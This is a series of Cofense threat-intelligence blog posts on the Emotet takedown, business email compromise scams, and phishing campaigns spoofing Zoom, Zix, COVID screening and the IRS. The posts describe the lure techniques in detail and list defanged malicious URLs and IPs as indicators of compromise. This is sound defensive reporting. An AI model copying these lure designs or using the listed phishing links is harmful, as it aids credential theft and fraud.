Emotet Disrupted but Likely to Return

By Brad Haas, Cofense Threat Intelligence 

Background 

Originally a banking Trojan, Emotet evolved to become more of a gateway for other malware families such as Ryuk, TrickBot, and QakBot. For the last few years, it has been among the top producers of malicious emails, using innovative and regularly updated techniques. For example, recently it harvested email reply chains from victims, and used those to create effective lures to send to the victims’ contacts. It also uses several tactics to avoid detection, such as delivery via password-protected zip file attachments and hosting itself on a large collection of legitimate but compromised websites. Emotet’s authors have shown remarkable patience and willingness to experiment and innovate: the botnet regularly ceases spam activity for weeks or months, during which time the authors issued updates to existing installations. 

Operation LadyBird 

On January 27authorities from eight countries conducted a disruption operation against Emotet. According to the Europol press release, the action—named Operation LadyBird—targeted several hundred servers worldwide. Authorities took over Emotet’s primary servers, which give updates to infected computers. They issued an update that replaces the list of Emotet command-and-control (C2) servers with a list of C2 servers under law enforcement control. Ukrainian police also identified two Emotet operators, from whom they seized cash, computers and other associated equipment. Finally, Dutch authorities recovered a trove of data stolen from Emotet victims, including email addresses, user names and passwords. They published a website allowing users to check whether their email address was in the compromised data. 

Figure 1: An Emotet emailwith an attached malicious Miscrosoft Office document, found in an environment protected by Microsoft Office 365 Advanced Threat Protection. 

What Happens Next 

Although Operation LadyBird had an immediate and substantial impact on Emotet operations, we assess that the botnet will likely return within the year. Despite the arrests in Europe, the threat actors ultimately in charge of Emotet remain at large. It is possible that they will simply retire, but even in that case the remnants of the botnet and the business relationships with other malware operators would likely be passed on to others. Emotet has been so effective that abandoning it entirely would very likely represent a lost opportunity for considerable profit. 

TrickBot survived a similar takedown in October 2020—it was built with a backup C2 configuration that allowed it to return to operation within a few weeks. Emotet has no such backup, but its operators can likely leverage its operators’ close relationship with the operators of TrickBot and other families to regain a broad base of installations on infected computers. Emotet’s operators also very likely have copies of the compromised data seized by the authorities, and there may be other data sets that were not seized. As we discussed above, they were already in the habit of taking long breaks in order to make improvements. We assess that they will likely withdraw again for at least a few months and improve their infrastructure to be more resilient against future law enforcement action, and then begin rebuilding their botnet. 

Note to Cofense Intelligence customers: You can refer to our July 2020 Flash Alert and our December 2020 Flash Alert for more details on previous Emotet lulls. 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.   
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.   

Phish Found in Proofpoint-Protected Environments Week ending January 29, 2021

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by secure email gateways (SEGs), were reported by humans, and analyzed and dispositioned by Cofense Triage.  

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.  

Are phishing emails evading your secure email gateway? The following are examples of phishing emails recently seen by the PDC in environments protected by Proofpoint and other SEGs. 

TYPE: ZLoader 

DESCRIPTION:  Finance-themed emails found in environments protected by Proofpoint deliver ZLoader via malicious Microsoft Office macros. 

TYPE: Credntial Phish 

DESCRIPTION: IRS-spoofed emails found in environments protected by Proofpoint and Microsoft ATP to deliver credential phishing via an embedded URL. 

TYPE: Credential Phish 

DESCRIPTION: LAN Associates-spoofing emails found in environments protected by O365-ATP deliver credential phishing via an embedded URL. 

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade secure email gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Threat Actor Attempt At Auditing: New Business Email Compromise Tactic

By Noah Mizell and Ashley Tran, Cofense Phishing Defense Center

The tactics used for conversations in business email compromises (BEC) can vary based on topics that often appear specific to a fellow coworker or to a collaboration on a private task for the CEO or other highranking executive. The members of the Cofense PDC are all too familiar with, for example, the line, “I want to surprise the staff with gifts.” However, threat actors have caught on to the fact that their tactics are not so secret anymore, and are well documented. With this newfound awareness comes the need to evolve methods. As noted in previous Cofense blogs, this can involve soliciting end users for sensitive revenue and customs details or, in the case  shown in Figure 1, posing as an audit for open invoices between two companies.details or in this case posing as an audit for open invoices between two companies.

Figure 1: Email Body 

In Figure 1, it can be noted that an email has been forwarded by an external user who had suspicions regarding the email seen under “Begin forwarded message.” The initial email is a request detailing the need to update the impersonated company’s “account record” for the forwarding user’s company, and asks for details on “any unpaid payments or an invoice due till date.” Following this request is the forged – yet convincing – email signature for that impersonated company’s chief financial officer, complete with logo.

Because this email was forwarded, the sender details can be seen in the body of the email. The threat actor has spoofed the sender email to appear as though it really did originate from the impersonated company: [email protected][REDACTEDCOMPANY].com. However, the actual email behind this attack is in the reply-to section of this email: [email protected]

The goal of this scam is simple – to obtain the invoice information and utilize it in a follow-up attack. This attack would reference the specific confidential information that was attained to get payment in the name of the impersonated company. Although the subject and wording of this BEC is different from the typical gift card request, or favor for the CEO, the impact most likely to result remains the same: financial crime.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.  

Phish Found in Proofpoint-Protected Environments Week ending January 22, 2021

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by secure email gateways (SEGs), were reported by humans, and analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint secure email gateway? The following are examples of phishing emails recently seen by the PDC in environments protected by Proofpoint.

 TYPE: Trojan 

DESCRIPTION:  Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links

TYPE: Keylogger 

DESCRIPTION: Order-themed emails found in environments protected by Proofpoint and O365-ATP deliver TrickBot via Microsoft Office macroladen spreadsheets downloaded from embedded URLs. 

TYPE: Trojan  

DESCRIPTION: Impots-spoofing email found in environments protected by Proofpoint deliver the Client Maximus banking Trojan via an advanced INF installer which is downloaded from an embedded URL. 

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade secure email gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Zoom Phish Sent Via Constant Contact Mailer

By Ashley Atkins, Cofense Phishing Defense Center

Since the start of the pandemic, cloud-based video conferencing has been heavily utilized. Whether for work purposes or for simply keeping in touch with family and friends, access to such a tool is vital. With the increased use of video conferencing, threat actors are taking advantage and abusing well-known video conferencing brands.   

The Cofense Phishing Defense Center (PDC) investigated an email impersonating Zoom. The email claimed that a Zoom server upgrade had been performed and that the recipient would be unable to invite or join calls unless they verified their account. Upon analysis, the PDC quickly identified the email as a credential phish. Within the email headers, the from field typically shows a display name and email address such as John Doe <[email protected]>. However, instead of the display name showing a name, it showed “Zoom – [email protected](.)us” making it appear as though the email was from Zoom

Figure 1: Email Body 

While Cofense has written about Zoom in prior blog posts, it is important to note that this particular email was sent through Constant Contact, a service used to send email for marketing campaigns. As noted on the Constant Contact website, the company provides a unique campaign ID in the Message-ID field allowing them to identify the sender. The headers shown in Figure 2 confirm that Constant Contact was used in this phishing attack. The attacker may have believed that Constant Contact emails would be better able to bypass various SEGs – a maneuver that seems to have been solid given the substantial number of SEG environments in which this phish was found.

Figure 2: Headers  

Figure 3: Malicious URL 

In Figure 3, the email shows the sender’s name to be “Zoom – no [email protected].us.” However, the actual compromised sender account can be seen beside it. This suggests that the threat actor may have compromised a user of Constant Contact, and has utilized that account to send out the attacks.

Hovering over the “Activate Now” button, Constant Contact’s tracking URL (r20[.]rs6[.]net) can be seen, as shown in Figure 3. When clicked, the recipient is directed to sankamilan[.]com” and is redirected to a fake Microsoft login page at “fueamgm[.]com[.]br,” as shown in Figure 4. Once credentials have been entered, the recipient is redirected again to a Microsoft inbox. 

Figure 4-5: Phishing Page 

As we can see, two different brands were used in this phishing campaign, which could result in attackers harvesting multiple sets of credentials.  

Indicators of Compromise 

hXXp://r20[.]rs6[.]net/tn.jsp?f=001SZ-07esJCtmzsTnl-2ahmSsp3CpswNGStwYWGtC_zI013A-LeFdz-SawGYz8wUt1zjLruZbLT67G_tPvkDNXRwcoznHPJSK7RS79ZwHLoicSBO6M6Tr-sPHkQ365MAq327s4IDhxhcGO2259_pUcjNZeRvwUri8p&c=3H_CP9T_hN834FXay-T3bJQcfuvdg7UAdRmIAMdqKRos8XzZ8B  213[.]190[.]6[.]27 
hXXps://sankamilan[.]com//httpd/ 

 

208[.]75[.]122[.]11 

 

hXXps://fueamgm[.]com[.]br/httd/ 

 

162[.]144[.]238[.]226 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.  

Coronavirus Screening and Testing Phishing Emails, and a Sense of Urgency Among Employees

By Ala Dabat, Cofense Phishing Defense Center

The Cofense PDC (Phishing Defense Center) has seen a continuous campaign by malicious actors exploiting the COVID-19 pandemic by using cleverly crafted phishingemail campaigns to harvest sensitive user data and spread malicious payloads across industry sectors.  

One such example seems to exploit the sense of urgency felt among employees for tests to screen for the COVID-19 virus. Recipients’ vulnerability is leveraged in attacks such as the one in Figure 1, a seeming Google form issued to employees by the targeted company(s). 

Figure 1 

The aesthetics of this particular campaign are solid and simple enough to reach users in environments protected by secure email gateways (SEGs). 

The email appears to be from the target company and its legitimacy is reenforced by references to guidelines and protocols issued by the “United States Department of Health.” Employees are advised that these protocols will facilitate the screening process, a clever way to persuade recipients to hand over credentials and other sensitive information (Figure 2). 

Figure 2 

In the above example, targeted users are redirected to a Google Doc landing page hosting the malicious website. A legitimate Googleregistered URL can often convince even security conscious users into handing over their information. 

Figure 3 

Figure 3 shows that the threat actor is blending common screening questions with the request for sensitive credentials, possibly to divert recipients from the threat. 

Figure 4 

Once the form has been completed, recipients are told to provide a digital signature to wrap up the fraudulent screening application and submit the data to a command-and-control server that stores the harvested information. 

Figure 5 

Indicators of Compromise 

Link  IP 
hXXps://docs[.]google[.]com/forms/d/e/1FAIpQLSdoUChSaN51UxKlyDMXUCOg6v5dMrqrcbDjFhX9LEFQ0zKWDQ/viewform?vc=0&c=0&w=1&flr=0&usp=mail_form_link 

 

172[.]217[.]9[.]206 

 

All third-party trademarks referenced byCofensewhether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship betweenCofenseand the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. 
   
TheCofense® and PhishMe® names and logos, as well as any otherCofenseproduct or service names or logos displayed on this blog are registered trademarks or trademarks ofCofenseInc. 

Secure Mailer Phish: A New Method of Swiping Users’ Credentials?

By Zachary Bailey, Cofense Phishing Defense Center

The rise in phishing attacks and increased delivery of sensitive information over email has fueled the demand for “secure mailers.” These services encrypt and store your organizations emails, only unlocking them if the designated recipient signs in. This takes the stress off the organization’s SEGs, or secure email gateways, when it comes to checking emails for sensitive or personally identifiable information (PII). However, secure mailers can be spoofed, and their credentials harvested – creating a new threat vector relative to sensitive emails. 

 Zix is a common secure mailer that is observed by the Cofense PDC. One threat actor mimicked Zix branding to create a lookalike phishing page using a custom domain that bypassed SEG protection. The attack relies on the target’s familiarity with Zix as they click through the encryption message and land on a Microsoft phishing page.  After submitting their credentials, the victim is redirected to a legitimate OneDrive error page.  

Figure 1: Email Body 

The email in Figure 1 looks typical of a secure mailer and uses a Zix message tag. The note saying “Michelle sent you a secure message” reinforces familiarity and lures the recipient into a false sense of security. The only lure here is asking the user to “Click here” to read on, while also advising how to complete the next step once they land on the website.  

Figure 2: Email Body Showing URL 

If the recipient hovers over the link, as shown in Figure 2, they will see that it goes to a “securemail” sub-domain, which is a common setup for these servicesIn the body of the message, they also see the expiration for retrieving the message

Figure 3: Phishing Page 

In Figure 2 we see the website mimics Zix landing site, which directs the recipient to interact with a click to read message” button (Figure 3)The site is also HTTPS encrypted, so any data sent through it cannot be read. If the user hovers over the button, they will notice that it leads to a different website. This is shown in Figure 4.   

Figure 4: Phishing Page 

During the transition from the secure mailer page, the title of the tab has changed from “SecureMail!” to “Sign in to your account,” accompanied by a Microsoft login page. This is an uncommon occurrence for secure mailers as they typically have their own login pages. 

Figure 5: Phishing Page 

After the user provides their credentials, a redirect occurs taking them to a OneDrive error page. Inspecting the network traffic shows that the entered credentials have been sent to the threat actor rather than Microsoft.This error page is a common tactic to convince the user that “something went wrong” and postpone or prevent recognition that their credentials were harvested.  

Indicators of Compromise 

hXXps://securemail[.]uadiaspora[.]com/  45[.]58[.]117[.]154 
hXXps://nojokemarketingpodcast[.]com/o1/main.html?  162[.]241[.]157[.]65 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.  

Phish Found in Proofpoint-Protected Environments Week ending January 15, 2021

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by secure email gateways (SEGs), were reported by humans, and analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint secure email gateway? The following are examples of phishing emails recently seen by the PDC in environments protected by Proofpoint.

TYPE: Credential Phish 

DESCRIPTION:  Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL. 

 

TYPE: Credential Phish 

DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL. Note: This was in Spanish. 

TYPE: Keylogger 

DESCRIPTION: Finance-themed emails found in environments protected by Symantec deliver the Agent Tesla keylogger via an embedded URL. 

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade secure email gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phishing Emails: All I Wanted Was for 2020 to End

By Dylan Duncan

2020 was far from ordinary 

And at the end, we learned one thing for sure: threat actors’ abilities to quickly adjust their methods to world events are pretty uncannyLike the rest of us, they must be news junkies, too.  

Every year, we see threat actors improve their methods and adapt to world events, bringing new trends to the phishing threat landscape. Last year, the COVID-19 pandemic in particular brought an unprecedented amount of disruption and financial hardship, directly leading to an increase in both volume and variety of threat activity. Threat actors continued to advance their tactics, techniques and procedures to ensure their emails would reach end users throughout the year 

Here are a few things we learned from the longest March to December in history:
 

  • COVID-19 was certainly the source of the most disruption in 2020. During the peak of pandemic-themed campaigns, phishing emails predominantly delivered credential phishing and Agent Tesla keylogger, but threat actors also delivered ransomware, keyloggers, remote access trojans and information stealers. 
  • Remote work became the new standard for an unprecedented number of employees as the pandemic led to lockdown protocols and workplace restrictions. The technologies associated with remote work led to new opportunities for threat actors, such as spoofing video chat applications and collaboration platforms.  
  • The Agent Tesla keylogger has been a prolific malware family since its release in 2014. This year it was the highest-volume keylogger and one of the top malware families overall observed by Cofense Intelligence. Agent Tesla has a competitive price tag compared to other malware and provides threat actors with complex features while maintaining an easy-to-use user experience.  
  • Since 2014, the Emotet botnet has been one of the top contributors to the phishing threat landscape. The more notable changes that surfaced this year allow for it to steal email attachments from victims’ inboxes, which are then used in phishing campaigns against targets who would find the attachments familiar. 
  • Ransomware was very active throughout the year, with a high number of new families and developments compared to other malware types. During October, United States authorities warned about campaigns targeting the health care industry. The campaigns delivered BazarBackdoor, which threat actors could use later to deploy Ryuk ransomware to intended targets.  

Phishing emails weaponizing the COVID-19 pandemic, remote work environment and presidential election were more effective than generic phishing templates. As the pandemic continues into the coming year, we expect that some related themes will continue, and we stand at the ready (as does our network of 25 million around the world identifying and reporting phishfor newly emerging themes and trends. 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.   
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.